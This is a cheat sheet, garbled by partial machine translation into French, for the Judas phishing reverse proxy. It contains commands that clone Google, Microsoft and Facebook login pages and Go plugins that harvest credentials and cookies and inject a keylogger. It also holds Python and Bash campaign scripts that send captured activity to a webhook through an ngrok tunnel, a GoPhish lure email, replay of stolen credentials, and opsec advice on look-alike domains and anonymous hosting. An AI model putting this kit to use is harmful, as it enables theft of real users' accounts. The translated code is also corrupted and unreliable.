Judas hameçonnage Proxy aide-mémoire
Overview
Judas is a pluggable hameçonnage proxy developed by joncooperworks that specializes in real-time website cloning through reverse proxy functionality. Unlike static hameçonnage pages, Judas creates dynamic clones that mirror the cible website's behavior, including JavaScript execution, form submissions, and session management. This makes it particularly effective for bypassing modern security measures and creating convincing hameçonnage campaigns.
⚠️ Warning: This tool is intended for authorized tests de pénétration and équipe rouge exercises only. Ensure you have proper autorisation before using against any cible.
Installation
Prerequisites
# Install Go 1.16+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go Installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
export GO111MODULE=on
Installation from GitHub
# Clone Judas repository
git clone https://github.com/joncooperworks/judas.git
cd judas
# Build Judas
go build -o judas cmd/judas/main.go
# Install to system path
sudo mv judas /usr/local/bin/
# Verify Installation
judas --help
Go Module Installation
# Install directly using go install
go install github.com/joncooperworks/judas/cmd/judas@latest
# Verify Installation
judas --help
Docker Installation
# Clone repository
git clone https://github.com/joncooperworks/judas.git
cd judas
# Build Docker image
docker build -t judas .
# Run Judas container
docker run -it --rm -p 8080:8080 judas --cible https://exemple.com --address 0.0.0.0:8080
# Run with SSL certificats
docker run -it --rm -p 443:443 -v $(pwd)/certs:/certs judas \
--cible https://exemple.com \
--address 0.0.0.0:443 \
--ssl-cert /certs/cert.pem \
--ssl-clé /certs/clé.pem
Manual Build
# Download source code
wget https://github.com/joncooperworks/judas/archive/main.zip
unzip main.zip
cd judas-main
# Install dependencies
go mod download
# Build binary
go build -lddrapeaus="-s -w" -o judas cmd/judas/main.go
# Set permissions
chmod +x judas
Basic utilisation
Simple Website Cloning
# Clone a website on localhôte
judas --cible https://exemple.com --address localhôte:8080
# Clone with custom listening address
judas --cible https://login.microsoftonline.com --address 0.0.0.0:8080
# Clone with SSL termination
judas --cible https://accounts.google.com \
--address 0.0.0.0:443 \
--ssl-cert cert.pem \
--ssl-clé clé.pem
# Clone with custom user agent
judas --cible https://facebook.com \
--address localhôte:8080 \
--user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Advanced configuration
# Clone with custom headers
judas --cible https://exemple.com \
--address localhôte:8080 \
--header "X-Forwarded-For: 192.168.1.100" \
--header "X-Real-IP: 192.168.1.100"
# Clone with proxy support
judas --cible https://exemple.com \
--address localhôte:8080 \
--proxy http://proxy.exemple.com:8080
# Clone with custom timeout
judas --cible https://exemple.com \
--address localhôte:8080 \
--timeout 30s
# Clone with verbose logging
judas --cible https://exemple.com \
--address localhôte:8080 \
--verbose
SSL/TLS configuration
# Generate self-signed certificats
openssl req -x509 -newclé rsa:4096 -cléout clé.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=hameçonnage.exemple.com"
# Use Let's Encrypt certificats
certbot certonly --standalone -d hameçonnage.exemple.com
judas --cible https://exemple.com \
--address 0.0.0.0:443 \
--ssl-cert /etc/letsencrypt/live/hameçonnage.exemple.com/fullchain.pem \
--ssl-clé /etc/letsencrypt/live/hameçonnage.exemple.com/privclé.pem
# Use custom CA certificats
judas --cible https://exemple.com \
--address localhôte:8080 \
--ca-cert custom-ca.pem
Plugin Development
Basic Plugin Structure
// plugins/logger/logger.go
package main
import (
"fmt"
"log"
"net/http"
"time"
"github.com/joncooperworks/judas/pkg/judas"
)
// LoggerPlugin logs all requests and responses
type LoggerPlugin struct \\\\{
logFile string
\\\\}
// NewLoggerPlugin creates a new logger plugin
func NewLoggerPlugin(logFile string) *LoggerPlugin \\\\{
return &LoggerPlugin;\\\\{
logFile: logFile,
\\\\}
\\\\}
// processusRequest processuses incoming requests
func (p *LoggerPlugin) processusRequest(req *http.Request) error \\\\{
log.Printf("[REQUEST] %s %s from %s", req.Method, req.URL.Path, req.RemoteAddr)
// Log form data
if req.Method == "POST" \\\\{
req.ParseForm()
for clé, values := range req.PostForm \\\\{
for _, value := range values \\\\{
log.Printf("[FORM] %s: %s", clé, value)
\\\\}
\\\\}
\\\\}
return nil
\\\\}
// processusResponse processuses outgoing responses
func (p *LoggerPlugin) processusResponse(resp *http.Response) error \\\\{
log.Printf("[RESPONSE] %d %s", resp.StatusCode, resp.Status)
return nil
\\\\}
// Name returns the plugin name
func (p *LoggerPlugin) Name() string \\\\{
return "Logger"
\\\\}
// Initialize sets up the plugin
func (p *LoggerPlugin) Initialize() error \\\\{
log.Printf("Logger plugin initialized with log file: %s", p.logFile)
return nil
\\\\}
// Cleanup performs plugin cleanup
func (p *LoggerPlugin) Cleanup() error \\\\{
log.Printf("Logger plugin cleanup completed")
return nil
\\\\}
// Plugin interface implementation
var Plugin LoggerPlugin
Credential Harvesting Plugin
// plugins/harvester/harvester.go
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"time"
"github.com/joncooperworks/judas/pkg/judas"
)
// Credential represents captured identifiants
type Credential struct \\\\{
Timestamp time.Time `json:"timestamp"`
IP string `json:"ip"`
UserAgent string `json:"user_agent"`
URL string `json:"url"`
Method string `json:"method"`
FormData map[string]string `json:"form_data"`
Headers map[string]string `json:"headers"`
Cookies map[string]string `json:"cookies"`
\\\\}
// HarvesterPlugin captures and stores identifiants
type HarvesterPlugin struct \\\\{
outputFile string
webhookURL string
identifiants []Credential
\\\\}
// NewHarvesterPlugin creates a new harvester plugin
func NewHarvesterPlugin(outputFile, webhookURL string) *HarvesterPlugin \\\\{
return &HarvesterPlugin;\\\\{
outputFile: outputFile,
webhookURL: webhookURL,
identifiants: make([]Credential, 0),
\\\\}
\\\\}
// processusRequest captures identifiants from requests
func (p *HarvesterPlugin) processusRequest(req *http.Request) error \\\\{
// Only processus POST requests with form data
if req.Method != "POST" \\\\{
return nil
\\\\}
// Parse form data
err := req.ParseForm()
if err != nil \\\\{
return err
\\\\}
// Check if this looks like a login form
if p.isLoginForm(req.PostForm) \\\\{
credential := Credential\\\\{
Timestamp: time.Now(),
IP: p.getClientIP(req),
UserAgent: req.UserAgent(),
URL: req.URL.String(),
Method: req.Method,
FormData: make(map[string]string),
Headers: make(map[string]string),
Cookies: make(map[string]string),
\\\\}
// Capture form data
for clé, values := range req.PostForm \\\\{
if len(values) > 0 \\\\{
credential.FormData[clé] = values[0]
\\\\}
\\\\}
// Capture relevant headers
for clé, values := range req.Header \\\\{
if len(values) > 0 && p.isRelevantHeader(clé) \\\\{
credential.Headers[clé] = values[0]
\\\\}
\\\\}
// Capture cookies
for _, cookie := range req.Cookies() \\\\{
credential.Cookies[cookie.Name] = cookie.Value
\\\\}
// Store credential
p.identifiants = append(p.identifiants, credential)
// Log capture
log.Printf("[HARVEST] Captured identifiants from %s", credential.IP)
// Save to file
p.saveCredential(credential)
// Send webhook notification
if p.webhookURL != "" \\\\{
go p.sendWebhook(credential)
\\\\}
\\\\}
return nil
\\\\}
// isLoginForm checks if the form contains login-like fields
func (p *HarvesterPlugin) isLoginForm(form map[string][]string) bool \\\\{
loginFields := []string\\\\{
"nom d'utilisateur", "email", "user", "login", "account",
"mot de passe", "pass", "pwd", "passwd",
\\\\}
for field := range form \\\\{
for _, loginField := range loginFields \\\\{
| if field == loginField | | |
fmt.Sprintf("%s", field) == loginField \\\\{
return true
\\\\}
\\\\}
\\\\}
return false
\\\\}
// getClientIP extracts the real client IP
func (p *HarvesterPlugin) getClientIP(req *http.Request) string \\\\{
// Check X-Forwarded-For header
if xff := req.Header.Get("X-Forwarded-For"); xff != "" \\\\{
return xff
\\\\}
// Check X-Real-IP header
if xri := req.Header.Get("X-Real-IP"); xri != "" \\\\{
return xri
\\\\}
// Fall back to RemoteAddr
return req.RemoteAddr
\\\\}
// isRelevantHeader checks if a header is relevant for logging
func (p *HarvesterPlugin) isRelevantHeader(header string) bool \\\\{
relevantHeaders := []string\\\\{
"User-Agent", "Accept", "Accept-Language", "Accept-Encoding",
"Referer", "Origin", "X-Forwarded-For", "X-Real-IP",
\\\\}
for _, relevant := range relevantHeaders \\\\{
if header == relevant \\\\{
return true
\\\\}
\\\\}
return false
\\\\}
// saveCredential saves credential to file
func (p *HarvesterPlugin) saveCredential(credential Credential) \\\\{
| file, err := os.OpenFile(p.outputFile, os.O_APPEND | os.O_CREATE | os.O_WRONLY, 0644) |
if err != nil \\\\{
log.Printf("Error opening output file: %v", err)
return
\\\\}
defer file.Close()
// Write as JSON
data, err := json.Marshal(credential)
if err != nil \\\\{
log.Printf("Error marshaling credential: %v", err)
return
\\\\}
file.Write(data)
file.WriteString("\n")
\\\\}
// sendWebhook sends credential data to webhook
func (p *HarvesterPlugin) sendWebhook(credential Credential) \\\\{
// Implementation for webhook notification
// This would send the credential data to a remote endpoint
log.Printf("Sending webhook notification for credential from %s", credential.IP)
\\\\}
// processusResponse processuses responses (not used for harvesting)
func (p *HarvesterPlugin) processusResponse(resp *http.Response) error \\\\{
return nil
\\\\}
// Name returns the plugin name
func (p *HarvesterPlugin) Name() string \\\\{
return "Harvester"
\\\\}
// Initialize sets up the plugin
func (p *HarvesterPlugin) Initialize() error \\\\{
log.Printf("Harvester plugin initialized with output file: %s", p.outputFile)
return nil
\\\\}
// Cleanup performs plugin cleanup
func (p *HarvesterPlugin) Cleanup() error \\\\{
log.Printf("Harvester plugin captured %d identifiants", len(p.identifiants))
return nil
\\\\}
// Plugin interface implementation
var Plugin HarvesterPlugin
Content Modification Plugin
// plugins/modifier/modifier.go
package main
import (
"bytes"
"io/ioutil"
"log"
"net/http"
"regexp"
"strings"
"github.com/joncooperworks/judas/pkg/judas"
)
// ModifierPlugin modifies response content
type ModifierPlugin struct \\\\{
replacements map[string]string
injections []string
\\\\}
// NewModifierPlugin creates a new modifier plugin
func NewModifierPlugin() *ModifierPlugin \\\\{
return &ModifierPlugin;\\\\{
replacements: make(map[string]string),
injections: make([]string, 0),
\\\\}
\\\\}
// AddReplacement adds a content replacement rule
func (p *ModifierPlugin) AddReplacement(search, replace string) \\\\{
p.replacements[search] = replace
\\\\}
// AddInjection adds content to inject
func (p *ModifierPlugin) AddInjection(content string) \\\\{
p.injections = append(p.injections, content)
\\\\}
// processusRequest processuses requests (not used for modification)
func (p *ModifierPlugin) processusRequest(req *http.Request) error \\\\{
return nil
\\\\}
// processusResponse modifies response content
func (p *ModifierPlugin) processusResponse(resp *http.Response) error \\\\{
// Only modify HTML content
contentType := resp.Header.Get("Content-Type")
if !strings.Contains(contentType, "text/html") \\\\{
return nil
\\\\}
// Read response body
body, err := ioutil.ReadAll(resp.Body)
if err != nil \\\\{
return err
\\\\}
resp.Body.Close()
// Convert to string for modification
content := string(body)
// Apply replacements
for search, replace := range p.replacements \\\\{
content = strings.ReplaceAll(content, search, replace)
\\\\}
// Inject additional content
for _, injection := range p.injections \\\\{
// Inject before closing body tag
content = strings.ReplaceAll(content, "</body>", injection+"</body>")
\\\\}
// Add clélogger script
cléloggerScript := `
<script>
document.addEventListener('clédown', function(e) \\{
fetch('/log-cléstroke', \\{
method: 'POST',
headers: \\{'Content-Type': 'application/json'\\},
body: JSON.stringify(\\{
clé: e.clé,
timestamp: Date.now(),
| cible: e.cible.name | | e.cible.id |
\\})
\\}).catch(() => \\{\\});
\\});
</script>
`
content = strings.ReplaceAll(content, "</head>", cléloggerScript+"</head>")
// Update response body
resp.Body = ioutil.NopCloser(bytes.NewReader([]byte(content)))
resp.ContentLength = int64(len(content))
resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(content)))
log.Printf("[MODIFY] Modified response content (%d bytes)", len(content))
return nil
\\\\}
// Name returns the plugin name
func (p *ModifierPlugin) Name() string \\\\{
return "Modifier"
\\\\}
// Initialize sets up the plugin
func (p *ModifierPlugin) Initialize() error \\\\{
// Add default replacements
p.AddReplacement("Sign In", "Sign In (Secure)")
p.AddReplacement("Login", "Login (Verified)")
// Add tracking pixel
trackingPixel := `<img src="/track.gif" width="1" height="1" style="display:none;">`
p.AddInjection(trackingPixel)
log.Printf("Modifier plugin initialized with %d replacements and %d injections",
len(p.replacements), len(p.injections))
return nil
\\\\}
// Cleanup performs plugin cleanup
func (p *ModifierPlugin) Cleanup() error \\\\{
log.Printf("Modifier plugin cleanup completed")
return nil
\\\\}
// Plugin interface implementation
var Plugin ModifierPlugin
configuration and Deployment
configuration File
# judas.yaml
cible: "https://accounts.google.com"
address: "0.0.0.0:443"
ssl_cert: "/etc/ssl/certs/cert.pem"
ssl_clé: "/etc/ssl/private/clé.pem"
# Proxy settings
proxy: "http://proxy.exemple.com:8080"
timeout: "30s"
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Headers to add
headers:
- "X-Forwarded-For: 192.168.1.100"
- "X-Real-IP: 192.168.1.100"
# Plugins
plugins:
- name: "logger"
config:
log_file: "/var/log/judas/access.log"
- name: "harvester"
config:
output_file: "/var/log/judas/identifiants.json"
webhook_url: "https://your-server.com/webhook"
- name: "modifier"
config:
replacements:
"Sign In": "Sign In (Secure)"
"Login": "Login (Verified)"
# Logging
log_level: "info"
log_file: "/var/log/judas/judas.log"
# Security
rate_limit: 100
max_connexions: 1000
Systemd service
# /etc/systemd/system/judas.service
[Unit]
Description=Judas hameçonnage Proxy
After=network.cible
[service]
Type=simple
User=judas
Group=judas
WorkingDirectory=/opt/judas
ExecStart=/usr/local/bin/judas --config /etc/judas/judas.yaml
Restart=always
RestartSec=5
# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ReadWritePaths=/var/log/judas
[Install]
WantedBy=multi-user.cible
Docker Compose
# docker-compose.yml
version: '3.8'
services:
judas:
build: .
ports:
- "443:443"
- "80:80"
volumes:
- ./certs:/certs:ro
- ./logs:/logs
- ./config:/config:ro
environment:
- JUDAS_cible=https://accounts.google.com
- JUDAS_ADDRESS=0.0.0.0:443
- JUDAS_SSL_CERT=/certs/cert.pem
- JUDAS_SSL_clé=/certs/clé.pem
commande: >
judas
--cible $\\\\{JUDAS_cible\\\\}
--address $\\\\{JUDAS_ADDRESS\\\\}
--ssl-cert $\\\\{JUDAS_SSL_CERT\\\\}
--ssl-clé $\\\\{JUDAS_SSL_clé\\\\}
--config /config/judas.yaml
restart: unless-stopped
nginx:
image: nginx:alpine
ports:
- "8080:80"
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:ro
depends_on:
- judas
restart: unless-stopped
Nginx Reverse Proxy
# nginx.conf
events \\\\{
worker_connexions 1024;
\\\\}
http \\\\{
upstream judas \\\\{
server judas:443;
\\\\}
server \\\\{
listen 80;
server_name hameçonnage.exemple.com;
location / \\\\{
proxy_pass https://judas;
proxy_set_header hôte $hôte;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# SSL settings
proxy_ssl_verify off;
proxy_ssl_session_reuse on;
\\\\}
# Logging
access_log /var/log/nginx/judas_access.log;
error_log /var/log/nginx/judas_error.log;
\\\\}
\\\\}
Automation and Scripting
Python Automation Script
#!/usr/bin/env python3
# Judas automation script
import subprocessus
import time
import json
import os
import requests
import threading
from datetime import datetime
class JudasAutomation:
def __init__(self, cible_url, listen_address="0.0.0.0:8080"):
self.cible_url = cible_url
self.listen_address = listen_address
self.processus = None
self.monitoring = False
self.webhook_url = "https://your-webhook-url.com/notify"
self.log_file = "judas.log"
self.identifiants_file = "identifiants.json"
def start_judas(self, ssl_cert=None, ssl_clé=None):
"""Start Judas proxy"""
cmd = [
"judas",
"--cible", self.cible_url,
"--address", self.listen_address,
"--verbose"
]
if ssl_cert and ssl_clé:
cmd.extend(["--ssl-cert", ssl_cert, "--ssl-clé", ssl_clé])
try:
self.processus = subprocessus.Popen(
cmd,
stdout=subprocessus.PIPE,
stderr=subprocessus.PIPE,
text=True
)
print(f"[+] Judas started with PID: \\\\{self.processus.pid\\\\}")
print(f"[+] cible: \\\\{self.cible_url\\\\}")
print(f"[+] Listening on: \\\\{self.listen_address\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Judas: \\\\{e\\\\}")
return False
def monitor_logs(self):
"""Monitor Judas logs for activity"""
self.monitoring = True
print("[+] Starting log monitoring...")
while self.monitoring:
try:
if self.processus and self.processus.poll() is None:
# Read stdout
line = self.processus.stdout.readline()
if line:
self.processus_log_line(line.strip())
time.sleep(0.1)
except Exception as e:
print(f"[-] Log monitoring error: \\\\{e\\\\}")
time.sleep(5)
def processus_log_line(self, line):
"""processus individual log line"""
try:
# Log to file
with open(self.log_file, 'a') as f:
f.write(f"\\\\{datetime.now().isoformat()\\\\} - \\\\{line\\\\}\n")
# Check for credential capture
if "POST" in line and any(field in line.lower() for field in ["mot de passe", "nom d'utilisateur", "email"]):
print(f"[+] Potential credential capture: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'credential_capture',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
# Check for new connexions
if "new connexion" in line.lower():
print(f"[+] New victim connexion: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'new_connexion',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
except Exception as e:
print(f"[-] Error processusing log line: \\\\{e\\\\}")
def send_notification(self, data):
"""Send webhook notification"""
try:
charge utile = \\\\{
'text': f"🎣 Judas Activity: \\\\{data['type']\\\\}",
'data': data
\\\\}
response = requests.post(
self.webhook_url,
json=charge utile,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def setup_ssl_certificats(self, domain):
"""Setup SSL certificats for domain"""
try:
# Generate self-signed certificat
cmd = [
"openssl", "req", "-x509", "-newclé", "rsa:4096",
"-cléout", "clé.pem", "-out", "cert.pem",
"-days", "365", "-nodes",
"-subj", f"/C=US/ST=State/L=City/O=Organization/CN=\\\\{domain\\\\}"
]
result = subprocessus.run(cmd, capture_output=True, text=True)
if result.returncode == 0:
print(f"[+] SSL certificats generated for \\\\{domain\\\\}")
return "cert.pem", "clé.pem"
else:
print(f"[-] Failed to generate SSL certificats: \\\\{result.stderr\\\\}")
return None, None
except Exception as e:
print(f"[-] SSL certificat generation error: \\\\{e\\\\}")
return None, None
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
port = self.listen_address.split(':')[1]
# Start ngrok tunnel
ngrok_processus = subprocessus.Popen([
"ngrok", "http", port
], stdout=subprocessus.PIPE, stderr=subprocessus.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhôte:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url, ngrok_processus
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None, None
def analyze_traffic(self):
"""Analyze captured traffic"""
try:
if not os.path.exists(self.log_file):
print("[-] No log file found")
return
with open(self.log_file, 'r') as f:
lines = f.readlines()
# Basic analysis
total_requests = len([line for line in lines if "HTTP" in line])
post_requests = len([line for line in lines if "POST" in line])
unique_ips = len(set([
line.split()[2] for line in lines
if len(line.split()) > 2 and "." in line.split()[2]
]))
# Generate report
report = \\\\{
'total_requests': total_requests,
'post_requests': post_requests,
'unique_ips': unique_ips,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save report
with open('traffic_analysis.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Analyse de Trafic complete:")
print(f" Total requests: \\\\{total_requests\\\\}")
print(f" POST requests: \\\\{post_requests\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f"[+] Report saved to: traffic_analysis.json")
except Exception as e:
print(f"[-] Analyse de Trafic error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1, use_ssl=False, domain=None):
"""Run complete hameçonnage campaign"""
print("[+] Starting Judas hameçonnage campaign...")
ssl_cert, ssl_clé = None, None
# Setup SSL if requested
if use_ssl and domain:
ssl_cert, ssl_clé = self.setup_ssl_certificats(domain)
if ssl_cert and ssl_clé:
# Update listen address for HTTPS
self.listen_address = self.listen_address.replace(':8080', ':443')
# Setup ngrok tunnel
public_url, ngrok_processus = self.setup_ngrok_tunnel()
# Start Judas
if not self.start_judas(ssl_cert, ssl_clé):
return False
# Start monitoring in background thread
monitor_thread = threading.thread(cible=self.monitor_logs)
monitor_thread.démon = True
monitor_thread.start()
# Send start notification
self.send_notification(\\\\{
'type': 'campaign_start',
'cible': self.cible_url,
'public_url': public_url,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Analyze traffic
self.analyze_traffic()
# Send completion notification
self.send_notification(\\\\{
'type': 'campaign_complete',
'cible': self.cible_url
\\\\})
# Cleanup
self.cleanup(ngrok_processus)
print("[+] Campaign completed successfully")
return True
def cleanup(self, ngrok_processus=None):
"""Cleanup processuses and files"""
try:
if self.processus and self.processus.poll() is None:
self.processus.terminate()
self.processus.wait(timeout=10)
print("[+] Judas processus terminated")
if ngrok_processus and ngrok_processus.poll() is None:
ngrok_processus.terminate()
print("[+] Ngrok tunnel stopped")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists(self.log_file):
final_backup = f"judas_log_\\\\{timestamp\\\\}.txt"
os.rename(self.log_file, final_backup)
print(f"[+] Final log backup: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
# utilisation exemple
def main():
# configuration
cible_url = "https://accounts.google.com"
listen_address = "0.0.0.0:8080"
duration_hours = 1
use_ssl = True
domain = "accounts-google-security.com"
# Create automation instance
automation = JudasAutomation(cible_url, listen_address)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours, use_ssl, domain)
if success:
print("[+] Campaign completed successfully")
else:
print("[-] Campaign failed")
if __name__ == "__main__":
main()
Bash Automation Script
#!/bin/bash
# Judas bash automation script
cible_URL="https://accounts.google.com"
LISTEN_ADDRESS="0.0.0.0:8080"
DURATION="3600" # 1 hour
USE_SSL="true"
DOMAIN="accounts-google-security.com"
# Function to start Judas
start_judas() \\\\{
echo "[+] Starting Judas proxy..."
local cmd="judas --cible $cible_URL --address $LISTEN_ADDRESS --verbose"
if [ "$USE_SSL" = "true" ]; then
# Generate SSL certificats
generate_ssl_certificats
cmd="$cmd --ssl-cert cert.pem --ssl-clé clé.pem"
fi
# Start Judas in background
$cmd > judas.log 2>&1 &
JUDAS_PID=$!
sleep 5
if kill -0 "$JUDAS_PID" 2>/dev/null; then
echo "[+] Judas started successfully (PID: $JUDAS_PID)"
return 0
else
echo "[-] Failed to start Judas"
return 1
fi
\\\\}
# Function to generate SSL certificats
generate_ssl_certificats() \\\\{
echo "[+] Generating SSL certificats for $DOMAIN..."
openssl req -x509 -newclé rsa:4096 -cléout clé.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=$DOMAIN" 2>/dev/null
if [ $? -eq 0 ]; then
echo "[+] SSL certificats generated successfully"
else
echo "[-] Failed to generate SSL certificats"
fi
\\\\}
# Function to setup ngrok tunnel
setup_ngrok() \\\\{
echo "[+] Setting up ngrok tunnel..."
local port=$(echo "$LISTEN_ADDRESS"|cut -d':' -f2)
ngrok http "$port" > /dev/null 2>&1 &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhôte:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\\\}
# Function to monitor logs
monitor_logs() \\\\{
echo "[+] Starting log monitoring..."
tail -f judas.log|while read line; do
echo "[LOG] $line"
# Check for credential capture
| if echo "$line" | grep -qi "POST.*mot de passe\ | POST.*nom d'utilisateur\ | POST.*email"; then |
echo "[+] Potential credential capture detected"
send_notification "credential_capture" "$line"
fi
# Check for new connexions
if echo "$line"|grep -qi "new connexion"; then
echo "[+] New victim connexion"
send_notification "new_connexion" "$line"
fi
done &
MONITOR_PID=$!
\\\\}
# Function to send notifications
send_notification() \\\\{
local type="$1"
local data="$2"
local webhook_url="https://your-webhook-url.com/notify"
if commande -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"🎣 Judas Activity: $type\", \"data\":\"$data\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\\\}
# Function to analyze traffic
analyze_traffic() \\\\{
echo "[+] Analyzing captured traffic..."
if [ ! -f "judas.log" ]; then
echo "[-] No log file found"
return
fi
local total_requests=$(grep -c "HTTP" judas.log)
local post_requests=$(grep -c "POST" judas.log)
| local unique_ips=$(grep -oP '\d+\.\d+\.\d+\.\d+' judas.log | sort -u | wc -l) |
echo "[+] Analyse de Trafic results:"
echo " Total requests: $total_requests"
echo " POST requests: $post_requests"
echo " Unique IPs: $unique_ips"
# Save analysis to file
cat > traffic_analysis.txt << EOF
Analyse de Trafic Report
Generated: $(date)
cible: $cible_URL
Duration: $DURATION seconds
Total requests: $total_requests
POST requests: $post_requests
Unique IPs: $unique_ips
EOF
echo "[+] Analysis saved to: traffic_analysis.txt"
\\\\}
# Function to cleanup
cleanup() \\\\{
echo "[+] Cleaning up..."
if [ -n "$JUDAS_PID" ]; then
kill "$JUDAS_PID" 2>/dev/null
echo "[+] Judas stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Log monitoring stopped"
fi
# Final backup
if [ -f "judas.log" ]; then
local timestamp=$(date +"%Y%m%d_%H%M%S")
cp judas.log "judas_log_$timestamp.txt"
echo "[+] Final log backup: judas_log_$timestamp.txt"
fi
exit 0
\\\\}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() \\\\{
echo "[+] Judas Automation Script"
echo "[+] cible: $cible_URL"
echo "[+] Listen Address: $LISTEN_ADDRESS"
echo "[+] Duration: $DURATION seconds"
echo "[+] SSL: $USE_SSL"
# Check dependencies
for cmd in judas openssl curl jq; do
if ! commande -v "$cmd" &> /dev/null; then
echo "[-] Required commande not found: $cmd"
exit 1
fi
done
# Setup ngrok tunnel
if setup_ngrok; then
# Start Judas
if start_judas; then
# Start log monitoring
monitor_logs
# Send start notification
send_notification "campaign_start" "cible: $cible_URL, Duration: $DURATION seconds"
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Analyze traffic
analyze_traffic
# Send completion notification
send_notification "campaign_complete" "cible: $cible_URL"
fi
fi
cleanup
\\\\}
# Execute main function
main
Integration with Other Tools
GoPhish Integration
# Integrate Judas with GoPhish for email delivery
import requests
import json
class GoPhishJudasIntegration:
def __init__(self, gophish_url, gophish_api_clé, judas_url):
self.gophish_url = gophish_url
self.gophish_api_clé = gophish_api_clé
self.judas_url = judas_url
self.headers = \\\\{
'autorisation': f'Bearer \\\\{gophish_api_clé\\\\}',
'Content-Type': 'application/json'
\\\\}
def create_gophish_campaign(self):
"""Create GoPhish campaign with Judas URL"""
campaign_data = \\\\{
"name": "Judas Proxy Campaign",
"template": \\\\{
"name": "Account Security Alert",
"subject": "Immediate Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected unusual activity on your account that requires immediate attention.</p>
<p>Please verify your identity to secure your account:</p>
<p><a href="\\\\{self.judas_url\\\\}" style="background-color: #1a73e8; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px;">Verify Account Now</a></p>
<p>This verification link will expire in 24 hours.</p>
<p>If you did not request this verification, please contact support immediately.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{self.judas_url\\\\}"
\\\\},
"page": \\\\{
"name": "Judas Redirect",
"html": f'<script>window.location.href="\\\\{self.judas_url\\\\}";</script>',
"redirect_url": self.judas_url
\\\\}
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
# utilisation
integration = GoPhishJudasIntegration(
"http://localhôte:3333",
"your_gophish_api_clé",
"https://your-judas-proxy.com"
)
campaign = integration.create_gophish_campaign()
Metasploit Integration
# Use Judas for credential harvesting, then pivot to Metasploit
# After capturing identifiants through Judas, use them in Metasploit
# exemple: Use captured identifiants for further exploitation
use auxiliary/scanner/http/http_login
set RhôteS cible-server.com
set nom d'utilisateur captured_nom d'utilisateur
set mot de passe captured_mot de passe
run
# Use captured session cookies
use auxiliary/scanner/http/cookie_replay
set COOKIE "captured_session_cookie"
set RhôteS cible.com
run
EvilGinx2 Integration
# Combine Judas with EvilGinx2 for advanced hameçonnage
# Use Judas for initial website cloning
# Use EvilGinx2 for 2FA bypass and session management
# Start Judas for website cloning
judas --cible https://accounts.google.com --address localhôte:8080
# Configure EvilGinx2 to use Judas as upstream
# This allows combining real-time cloning with 2FA bypass
Operational Security
Infrastructure Security
# Use VPS with anonymous payment
# Setup through Tor/VPN
# Use legitimate domain names
# Implement proper SSL certificats
# exemple secure deployment
# 1. Purchase VPS with cryptocurrency
# 2. Access through Tor browser
# 3. Register domain with privacy protection
# 4. Setup Let's Encrypt SSL
# 5. Configure proper logging and monitoring
Domain and SSL Setup
# Register legitimate-looking domain
# exemple: accounts-google-verification.com
# Setup Let's Encrypt SSL
